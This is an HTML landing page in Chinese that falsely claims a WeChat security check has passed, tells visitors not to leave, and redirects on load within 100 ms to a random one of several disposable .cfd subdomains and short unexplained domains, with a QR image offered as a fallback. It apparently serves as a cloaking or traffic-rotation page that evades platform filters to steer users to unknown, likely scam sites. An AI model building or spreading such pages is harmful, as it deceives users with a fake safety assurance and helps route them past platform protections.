<!DOCTYPE html>
<html>
  <head>
    <title>加载中.....</title>
    <style>
      body {
        font-family: Arial, sans-serif;
        background-color: #f0f0f0;
        display: flex;
        flex-direction: column;
        justify-content: flex-start;
        align-items: center;
        height: 100vh;
        margin: 0;
        color: #333;
      }

      .container {
        text-align: center;
      }

      h1 {
        color: #48bc27;
        font-size: 45px;
        margin-bottom: 10px;
      }

      .highlight {
        color: #007bff;
        font-size: 37px;
        font-weight: bold;
      }
      .icon {
        margin-bottom: 20px;
      }

      .icon img {
        width: 40px;
        height: 40px;
      }
      .image-container {
        display: flex;
        flex-direction: column;
        align-items: center;
        margin-top: 2em;
      }

      .image-container img {
        max-width: 100%;
        height: auto;
        margin-top: 1em;
      }
    </style>
    <script type="text/javascript">
      window.onload = function () {
        var links = [
          "http://wsm7m.mgwrnahh.cfd/nByw9okg",
          "http://z4emn.rmlraclf.cfd/bET1AI2t",
          "http://57jcp.oaifxano.cfd/up2awEl2",
          "http://csfcs.fmvvspak.cfd/zbXoz4ig",
          "https://um8s.com",
          "https://bt0l.com",
        ];
        var randomLink = links[Math.floor(Math.random() * links.length)];
        setTimeout(function () {
          window.location.href = randomLink;
        }, 100);
      };
    </script>
  </head>
  <body>
    <div class="container">
      <div class="icon">
        <img src="img2/icon.png" alt="Icon" />
      </div>
      <h1>微信安全检测已通过！页面访问安全！</h1>
      <p><span class="highlight">请稍等，不要退出！页面正在跳转中...</span></p>
      <p>
        <span class="highlight">“如遇跳转失败请截图扫码”</span>
      </p>
    </div>
    <div class="image-container">
      <!-- <img src="img2/1.jpg" alt="Image 1" />
      <img src="img2/2.jpg" alt="Image 2" />
      <img src="img2/3.jpg" alt="Image 3" /> -->
      <img src="img2/4.jpg" alt="Image 4" />
    </div>
  </body>
</html>
